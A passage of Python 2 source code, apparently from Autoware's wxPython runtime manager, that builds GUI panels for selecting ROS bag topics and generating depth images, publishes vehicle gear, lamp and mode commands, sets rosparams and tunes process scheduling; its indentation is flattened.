#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_pointcloud_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_pointcloud_topic.Add(down_area, 1, wx.EXPAND, 4)
if sizer_image_topic != None:
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_image_topic)
if sizer_pointcloud_topic != None:
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_pointcloud_topic)
sss.SetSizer(szr)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def delete_topic_panel(self, szr, num=0):
topic_list = self.select_topic_delete_dic[num]
for topic in topic_list:
szr.Hide(topic)
szr.Remove(topic)
self.select_topic_delete_dic[num] = []
def delete_launch(self):
for k, val in self.selected_topic_dic.items():
k.SetValue(0)
self.launch_kill_proc2(k, self.cmd_dic)
val = self.selected_topic_dic.pop(k)
print("Kill '%s'" % self.cmd_dic[k][0])
self.cmd_dic.pop(k)
def OnConfirmDepth(self, event):
push = event.GetEventObject()
if self.button_confirm_depth.GetValue():
button_var = getattr(self, "button_" + "button_input100")
button_var2 = getattr(self, "button_" + "button_input101")
output_url = self.obj_to_varpanel_tc(button_var, 'file').GetValue()
calib_url = self.obj_to_varpanel_tc(button_var2, 'file').GetValue()
if ("Please Set Output Directory" == output_url) or (not output_url) or (" " in output_url):
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Set Correct Output Directory")
return
if output_url[-1] == "/":
output_url = output_url[:-1]
if not self.image_for_depth:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Select Image Topic")
return
if not self.pointcloud_for_depth:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
wx.MessageBox("Please Select Pointcloud Topic")
return
if ("Please Set Calibration File" == calib_url) or (not calib_url) or (" " in calib_url):
wx.MessageBox("Please Set Correct Calibration File URL")
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
return
else:
if not os.path.exists(output_url):
subprocess.call(['mkdir', '-p', output_url])
cmd = "rosrun data_preprocessor get_Depth %s %s %s %s" % (output_url, calib_url, self.image_for_depth, self.pointcloud_for_depth)
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
self.depth_flag = True
self.button_confirm_depth.SetBackgroundColour("#8B8BB9")
self.button_confirm_depth.SetForegroundColour("#F9F9F8")
#):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0')
# self.selected_topic_dic[push] = push
print("launch '%s'" % self.cmd_dic[push][0])
else:
self.launch_kill_proc2(push, self.cmd_dic)
# val = self.selected_topic_dic.pop(push)
self.depth_flat = False
print("Kill '%s'" % self.cmd_dic[push][0])
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
def get_depth_topic(self):
self.topic_type = None
bag_url = self.get_bag_url()
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_depth_topics
sss = self.depth_scroll
sssb = self.sizer_depth_box
#sssb.Remove(sss)
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=1)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
is_image_topic = False
is_pointcloud_topic = False
select_image_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Image")
select_image_staticbox.Lower()
sizer_image_topic = wx.StaticBoxSizer(select_image_staticbox, wx.VERTICAL)
select_pointcloud_staticbox = wx.StaticBox(sss, wx.ID_ANY, "PointCloud")
select_pointcloud_staticbox.Lower()
sizer_pointcloud_topic = wx.StaticBoxSizer(select_pointcloud_staticbox, wx.VERTICAL)
if True:
select_output_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Depth Output Directory")
select_output_staticbox.Lower()
sizer_output_topic = wx.StaticBoxSizer(select_output_staticbox, wx.VERTICAL)
self.output_url = "output"
self.output_depth = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, 100, "", "", self.output_url, "self.output_depth", file_type="dir", comment="Please Set Output Directory")
output_area = wx.BoxSizer( wx.HORIZONTAL)
output_area.Add(self.output_depth, 1, wx.ALL | wx.EXPAND, 4)
sizer_output_topic.Add(output_area, 1, wx.EXPAND, 4)
szr.Add(sizer_output_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_output_topic)
if True:
select_calib_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Camera / Lidar Calibration File")
select_calib_staticbox.Lower()
sizer_calib_topic = wx.StaticBoxSizer(select_calib_staticbox, wx.VERTICAL)
self.calib_url = "calib"
self.panel_calibration = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, 101, "", "", self.calib_url, "self.panel_calibration", file_type="file", comment="Please Set Calibration File")
calib_area = wx.BoxSizer( wx.HORIZONTAL)
calib_area.Add(self.panel_calibration, 1, wx.ALL | wx.EXPAND, 4)
sizer_calib_topic.Add(calib_area, 1, wx.EXPAND, 4)
szr.Add(sizer_calib_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_calib_topic)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
i = i + 30
if topic_type == "sensor_msgs/Image":
is_image_topic = True
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnSelectImageCheckbox, obj)
self.select_created_topic[obj] = topic
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_image_topic.Add(up_area)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type == "sensor_msgs/PointCloud2" or topic_type == "velodyne_msgs/VelodyneScan":
is_pointcloud_topic = True
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.velodyne_button = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.velodyne_button.SetValue(0)
self.velodyne_button.Disable()
self.velodyne_button.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.velodyne_button)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetDepthLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_pointcloud_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_depth = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_depth.Disable()
self.output_depth.Enable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnSelectPointCheckbox, obj)
self.select_created_topic[obj] = topic
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_pointcloud_topic.Add(up_area)
if is_image_topic:
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_image_topic)
else:
topic_sentence = " Please choose the Bag File including Image Topic"
imagepanel = wx.Panel(sss, wx.ID_ANY)
obj = wx.StaticText(imagepanel, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj.SetFont(font)
obj.SetForegroundColour("#FF0000")
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(imagepanel, 1, wx.ALL | wx.EXPAND, 4)
sizer_image_topic.Add(up_area)
szr.Add(sizer_image_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_image_topic)
if is_pointcloud_topic:
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_pointcloud_topic)
else:
topic_sentence = " Please choose the Bag File including PointCloud Topic"
pointcloudpanel = wx.Panel(sss, wx.ID_ANY)
obj = wx.StaticText(pointcloudpanel, wx.ID_ANY, topic_sentence)
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj.SetFont(font)
obj.SetForegroundColour("#FF0000")
up_area = wx.BoxSizer( wx.HORIZONTAL)
up_area.Add(pointcloudpanel, 1, wx.ALL | wx.EXPAND, 4)
sizer_pointcloud_topic.Add(up_area)
szr.Add(sizer_pointcloud_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[1].append(sizer_pointcloud_topic)
sss.SetSizer(szr)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def ROSCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
#self.set_param_panel(obj, pnl)
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', LampCmd, queue_size=10)
msg = LampCmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', IndicatorCmd, queue_size=10)
msg = IndicatorCmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.runtime_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
msec = int(getattr(msg, attr, 0))
exec_time = self.runtime_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
self.update_depend_enable(pdic, gdic, prm)
d = self.cfg_dic( {'pdic':pdic, 'gdic':gdic, 'param':prm}, sys=True )
self.update_proc_cpu(d.get('obj'), d.get('pdic'), d.get('param'))
def update_proc_cpu(self, obj, pdic=None, prm=None):
if obj is None or not obj.GetValue():
return
(_, _, proc) = self.obj_to_cmd_dic_cmd_proc(obj)
if proc is None:
return
if pdic is None or prm is None:
(pdic, _, prm) = self.obj_to_pdic_gdic_prm(obj, sys=True)
cpu_chks = self.param_value_get(pdic, prm, 'cpu_chks')
cpu_chks = cpu_chks if cpu_chks else [ True for i in range(get_cpu_count()) ]
cpus = [ i for i in range(get_cpu_count()) if cpu_chks[i] ]
nice = self.param_value_get(pdic, prm, 'nice', 0)
d = { 'OTHER':SCHED_OTHER, 'FIFO':SCHED_FIFO, 'RR':SCHED_RR }
policy = SCHED_OTHER
priority = 0
if self.param_value_get(pdic, prm, 'real_time', False):
policy = d.get(self.param_value_get(pdic, prm, 'policy', 'FIFO'), SCHED_FIFO)
priority = self.param_value_get(pdic, prm, 'prio', 0)
procs = [ proc ] + proc.get_children(recursive=True)
for proc in procs:
print 'pid={}'.format(proc.pid)
if proc.get_nice() != nice:
print 'nice {} -> {}'.format(proc.get_nice(), nice)
if set_process_nice(proc, nice) is False:
print 'Err set_process_nice()'
if proc.get_cpu_affinity() != cpus:
print 'cpus {} -> {}'.format(proc.get_cpu_affinity(), cpus)
if set_process_cpu_affinity(proc, cpus) is False:
print 'Err set_process_cpu_affinity()'
policy_str = next( (k for (k,v) in d.items() if v == policy), '?')
print 'sched policy={} prio={}'.format(policy_str, priority)
if set_scheduling_policy(proc, policy, priority) is False:
print 'Err scheduling_policy()'
def param_value_get(self, pdic, prm, name, def_ret=None):
def_ret = self.param_default_value_get(prm, name, def_ret)
return pdic.get(name, def_ret) if pdic else def_ret
def param_default_value_get(self, prm, name, def_ret=None):
return next( (var.get('v') for var in prm.get('vars') if var.get('name') == name ), def_ret) \
if prm else def_ret
def update_depend_enable(self, pdic, gdic, prm):
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
depend = gdic_v.get('depend')
if depend is None:
continue
vp = gdic_v.get('var')
if vp is None:
continue
v = pdic.get(depend)
if v is None:
continue
depend_bool = eval( gdic_v.get('depend_bool', 'lambda v : bool(v)') )
v = depend_bool(v)
enables_set(vp, 'depend', v)
def publish_param_topic(self, pdic, prm):
pub = prm['pub']
klass_msg = globals()[ prm['msg'] ]
msg = klass_msg()
for (name, v) in pdic.items():
if prm.get('topic') == '/twist_cmd' and name == 'twist.angular.z':
v = -v
(obj, attr) = msg_path_to_obj_attr(msg, name)
if obj and attr in obj.__slots__:
type_str = obj._slot_types[ obj.__slots__.index(attr) ]
setattr(obj, attr, str_to_rosval(v, type_str, v))
if 'stamp' in prm.get('flags', []):
(obj, attr) = msg_path_to_obj_attr(msg, 'header.stamp')
setattr(obj, attr, rospy.get_rostime())
pub.publish(msg)
def rosparam_set(self, pdic, prm):
rosparams = None
for var in prm.get('vars', []):
name = var['name']
if 'rosparam' not in var or name not in pdic:
continue
rosparam = var['rosparam']
v = pdic.get(name)
v = str(v)
cvdic = { 'True':'true', 'False':'false' }
if v in cvdic:
v = cvdic.get(v)
if rosparams is None:
cmd = [ 'rosparam', 'list' ]
rosparams = subprocess.check_output(cmd).strip().split('\n')
nm = rosparam
nm = ('/' if len(nm) > 0 and nm[0] != '/' else '') + nm
exist = nm in rosparams
if exist:
cmd = [ 'rosparam', 'get', rosparam ]
ov = subprocess.check_output(cmd).strip()
if ov == v:
continue
elif v == '':
continue
cmd = [ 'rosparam', 'set', rosparam, v ] if v != '' else [ 'rosparam', 'delete', rosparam ]
print("ROSparam_set")
print(cmd)
subprocess.call(cmd)
#
# Sensing Tab
#
def OnSensingDriver(self, event):
self.OnChecked_obj(event.GetEventObject())
def OnROSbagRecord(self, event):
self.dlg_rosbag_record.Show()
obj = event.GetEventObject()
set_val(obj, False)
def create_checkboxes(self, dic, panel, sizer, probe_dic, run_dic, bind_handler):
if 'name' not in dic:
return
obj = None
bdr_flg = wx.ALL
if 'subs' in dic:
lst = []
for d in dic['subs']:
self.create_checkboxes(d, panel, lst, probe_dic, run_dic, bind_handler)
if dic['name']:
obj = static_box_sizer(panel, dic.get('name'))
set_tooltip(obj.GetStaticBox(), dic)
else:
obj = wx.BoxSizer(wx.VERTICAL)
for (o, flg) in lst:
obj.Add(o, 0, wx.EXPAND | flg, 4)
else:
obj = wx.CheckBox(panel, wx.ID_ANY, dic['name'])
set_tooltip(obj, dic)
self.Bind(wx.EVT_CHECKBOX, bind_handler, obj)
bdr_flg = wx.LEFT | wx.RIGHT
if 'probe' in dic:
probe_dic[obj] = (dic['probe'], None)
if 'run' in dic:
run_dic[obj] = (dic['run'], None)
if 'param' in dic:
obj = self.add_config_link(dic, panel, obj)
else:
gdic = self.gdic_get_1st(dic)
self.add_cfg_info(obj, obj, dic.get('name'), None, gdic, False, None)
if sizer is not None:
sizer.append((obj, bdr_flg))
else:
panel.SetSizer(obj)
def add_config_link(self, dic, panel, obj):
cfg_obj = wx.HyperlinkCtrl(panel, wx.ID_ANY, '[config]', '')
fix_link_color(cfg_obj)
self.Bind(wx.EVT_HYPERLINK, self.OnConfig, cfg_obj)
add_objs = (obj, wx.StaticText(panel, wx.ID_ANY, ' '), cfg_obj)
hszr = sizer_wrap(add_objs, wx.HORIZONTAL)
name = dic['name']
pdic = self.load_dic_pdic_setup(name, dic)
gdic = self.gdic_get_1st(dic)
prm = self.get_param(dic.get('param'))
self.add_cfg_info(cfg_obj, obj, name, pdic, gdic, True, prm)
return hszr
def camera_ids(self):
if self.button_synchronization.GetValue():
return []
cmd = "rostopic list | sed -n 's|/image_raw||p' | sed s/^$//"
return subprocess.check_output(cmd, shell=True).strip().split()
def cam_id_to_obj(self, cam_id, v):
cam_id_obj = self.cfg_prm_to_obj( {'name':cam_id} )
if cam_id_obj is None:
cam_id_obj = StrValObj(cam_id, v)
cam_id_obj.SetValue(v)
return cam_id_obj
def camera_id_hook(self, args):
new_id = args.get('pdic', {}).get('camera_id', '')
ids = args.get('ids', [])
if new_id not in ids:
return
idx = ids.index(new_id)
pp = args.get('param_panel')
if pp:
pp.detach_func()
dlg = args.get('dlg')
if dlg:
dlg.EndModal(idx + 100)
def OnCalibrationPublisher(self, event):
obj = event.GetEventObject()
(_, gdic_org, prm) = self.obj_to_pdic_gdic_prm(obj)
if obj.GetValue():
gdic_org['ids'] = self.camera_ids()
ids = gdic_org.get('ids', [])
if ids == []:
self.OnLaunchKill(event)
return
#
# setup
#
(cmd_dic, cmd, _) = self.obj_to_cmd_dic_cmd_proc(obj)
